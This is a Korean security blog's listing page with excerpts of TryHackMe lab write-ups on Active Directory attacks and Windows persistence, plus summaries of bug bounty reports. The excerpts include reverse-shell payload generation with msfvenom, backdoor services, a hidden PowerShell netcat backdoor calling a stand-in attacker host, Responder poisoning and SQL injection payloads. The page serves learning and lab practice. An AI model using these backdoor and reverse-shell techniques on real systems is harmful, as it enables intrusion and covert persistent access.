본문 바로가기

전체 글

Breaching Active Directory (2)
Play/THM 2023. 10. 12. Breaching Active Directory (2) Task 5 Authentication Relays Responder 다운로드 링크 Responder는 IPv6/IPv4 LLMNR/NBT-NS/mDNS 포이즈너(Poisoner)로, 이를 통해 NetNTLM Challenge를 가로챌 수 있다. 로컬 네트워크 내 Challenge만 가능하며 현재 VPN을 통해 네트워크에 연결되어 있으므로 해당 VPN 네트워크에서 발생하는 인증 Challenge 타겟이된다. THM의 어택박스로 실습하니 왜인지 작동하지 않아서 VPN을 사용했다. [KALI VM] openvpn breachingad.ovpn 1) TryHackMe에서 제공하는 네트워크 VPN서버로,이것을 실행해준다 (링크) 2) ifconfig 3) Responder 다운 후 실행 responder -I ..
Breaching Active Directory (1)
Play/THM 2023. 9. 27. Breaching Active Directory (1) 랩실에서 실습하기 위한 사전 준비 [ATTACKBOX] systemd-resolve --interface breachad --set-dns {THMDC_IP} --set-domain za.tryhackme.com nslookup thmdc.za.tryhackme.com Task 4 LDAP Bind Credentials 애플리케이션이 사용할 수 있는 AD인증방법 4.1 NTLM - 시도-응답 기반 체계인 NetNTLM을 사용 - 애플리케이션이 사용자를 대신하여 인증, 애플리케이션 자체에서 직접 사용자를 인증하지 않음 - AD자격증명은 DC에만 저장 (애플리케이션에 저장X) 4.2 LDAP - 애플리케이션이 사용자의 자격 증명을 직접 확인함 - 애플리케이션은 AD 자격증명 쌍을 가지고 있음 (해당 쌍을 사..
Windows Local Persistence (3)
Play/THM 2023. 9. 25. Windows Local Persistence (3) TASK 4. 서비스 남용 4.1 Creating backdoor services 1) 리버스쉘 페이로드 만들기 msfvenom -p windows/x64/shell_reverse_tcp LHOST={ATTACKER_IP} LPORT=4448 -f exe-service -o rev-svc.exe * 포맷이 exe-service이다. 2) 가져오기 scp root@{ATTACKER_IP}:/root/rev-svc.exe c:\windows\ 3) nc 리스닝 4) 서비스 등록하기 sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto sc.exe start THMservice2 4.2 Modifying existing services..
Windows Local Persistence (2)
Play/THM 2023. 9. 25. Windows Local Persistence (2) Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술 * 참고 : MITRE ATT&CK TASK 3 3.1 Executable Files 바탕화면에 calc.exe 바로가기가 있다고 가정 1) PS 스크립트 만들기 # C:\Windows\System32\backdoor.ps1 Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe {ATTACKER_IP} 4444" C:\Windows\System32\calc.exe 2) 바탕화면에 있는 calc.exe 바로가기의 Target 변경 # target # PowerShell 스크립트가 숨겨진 창에서 실행 powershell.exe -WindowStyle hidden C:\Windo..
Windows Local Persistence (1)
Play/THM 2023. 9. 25. Windows Local Persistence (1) Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술 * 참고 : MITRE ATT&CK TASK 2. 타 계정의 권한 조작 지속성을 얻는 가장 쉬운 방법은 "관리자의 크리덴셜을 얻는 것" 이다. 다만, 블루팀 측에서 탐지하기 어렵게 하기 위해, 타 계정을 조작하여 관리자의 권한을 부여하는 방법을 사용할 것이다. ※ 가정 : 타겟 컴퓨터의 패스워드 해시를 덤프, 계정의 비밀번호를 성공적으로 크랙함 (Administrator) ※ kali에서 타겟으로 접속할 때 evil-winrm 툴을 사용한다. evil-winrm -i {TARGET IP} -u user1 -p Password1234 2.1 Assign Group Memberships 2.1.1 administrators # ..
버그바운티 보고서 - SSRF Dropbox
보안/버그바운티 2023. 9. 21. 버그바운티 보고서 - SSRF Dropbox 보고서 링크(HERE) SSRF Dropbox 타겟 : Dropbox, 문서를 가져오는 기능 * Dropbox, Google Drive, OneDrive, EverNote 등에서 문서를 가져올 수 있는 기능 * 해당 포인트에서 SSRF 취약점을 발견함 1.1 공격자의 서버에 접근하여 문서를 가져갈 수 있는지 확인 file_reference 매개변수를 변경했더니 404 확인 1.2 service_type과 file_reference가 맞아야 하는 것을 깨달음 service_type=O 면 file_reference는 OneDrive 주소가 와야함. GET /attachment/externalFile?service_type=O&file_reference=MYONEDRIVEFILELINKHERE&file_na..
버그바운티 보고서 - Path Traversal to RCE
보안/버그바운티 2023. 9. 21. 버그바운티 보고서 - Path Traversal to RCE 보고서 링크 (HERE) [취약점 재연 방법] 문제가 되는 소스 : maven_packages.rb 버전 : GitLab 12.5.3(grape 1.1) * GitLab은 루비온레일즈를 통해 만들었고, 루비온레일즈는 기본적으로 RESTAPI 기능을 grape 프레임워크를 사용하여 처리함. * 해당 버전은 기본적으로 들어온 URL에 대해서 URL decoding을 하지 않음 [순서] 1) GitLab 인스턴스를 빌드하기 전에 package 기능 활성화 2) Project 생성 3) API 호출을 위한 private token 생성 4) 공격 페이로드 전송 5) ssh 접속 [공격 페이로드 전송] # 공격 페이로드 curl -H "Private-Token: $(cat token)" http://127.0.0..
버그바운티 보고서 - Time-Based SQL Injection to RCE
보안/버그바운티 2023. 9. 21. 버그바운티 보고서 - Time-Based SQL Injection to RCE 보고서 링크(Here) SQL Injection to RCE HackerOne Blind User-Agent SQL Injection to Blind Remote OS Command Execsution at `~~.com` 1.1 사용자 입력값을 받는지 확인 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'-- 1.2 Time-based SQL Injection User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C..

티스토리툴바